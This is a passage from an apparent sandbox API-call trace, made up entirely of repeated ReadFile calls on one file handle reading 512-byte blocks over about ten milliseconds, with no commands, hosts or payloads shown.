hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 
[0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, 
lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, 
lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: 
lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, 
lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, 
lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile 
(in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 
[0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, 
lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 